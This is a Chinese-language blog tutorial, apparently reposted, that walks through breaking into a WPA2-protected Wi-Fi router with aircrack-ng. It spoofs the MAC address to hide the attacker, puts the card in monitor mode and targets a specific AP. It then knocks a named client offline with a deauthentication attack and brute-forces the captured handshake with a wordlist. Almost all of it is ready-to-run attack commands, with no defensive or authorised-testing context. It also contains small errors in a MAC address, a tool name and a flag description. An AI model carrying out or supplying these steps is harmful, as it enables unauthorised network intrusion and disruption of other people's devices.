Aircrack-ng暴力破解WPA-PSK加密wifi

来源:互联网 发布:粒子群算法应用 编辑:程序博客网 时间:2024/06/09 19:51

将破解WAP2加密的路由器整个过程做个记录:

→1、airmon-ng 查看当前的无线网卡接口


→ 2、修改主机的的mac地址,隐藏真实的mac地址,修改mac前需要先停止无线网卡,ifconfig wlan0 down停止无线网卡

→ 3、macchanger  --mac 00:11:22:33:44:55 wlan0修改mac地址为00:11:33:44:55

→ 4、ifconfig wlan0 up 启动无线网卡

→ 5、ifconfig查看网卡信息就会发现无线网卡的mac地址已经发生改变


→ 6、如果要使用嗅探工具嗅探时,首先要激活无线网卡至监听模式,airmon-ng start wlan0激活无线网卡为监听模式


驱动mac80211,显示为monitor mode enabled on mon0,即已启动监听模式


→ 7、airodump-ng  wlan0 抓包之前,一般先进行探测,扫描发现周围的无线网络设备,然后锁定一个AP(路由器)


→ 8、airodump --bssid FC:D7:33:5D:2E:32 -c 11 -w wifi wlan0锁定这个AP,防止窗口跳动不稳定。

--bssid接APmac , -c接频道  -w接文件名 


→ 9、保持这个窗口不动,注意,不要把它关闭了。另外打开一个Shell进行下面的操作,

aireplay-ng  --deauth  10  -a  FC:D7:33:5D:2E:32  -h  AC:5F:3E:76:73:C1 wlan0 

 --deauth说明使用deauth攻击,10表示攻击十次,-a接AP的mac,-c接攻击的子设备mac


对这个AP下的mac地址为 AC:5F:3E:76:73:C1的子设备进行攻击,迫使断线,AP就会重新对这个设备连接,然后就可以抓取

其中的信息 ,这时第8步骤中锁定路由器的shell就会出现


→ 10、这时候就可以进行暴力破解了aircrack-ng  -w  ./dic.txt  wifi-01.cap

-w接暴力破解用的字典,wifi-01.cap为第8步骤生成的文件,回车


然后慢慢等,能不能破解就看字典好不好用了

0 0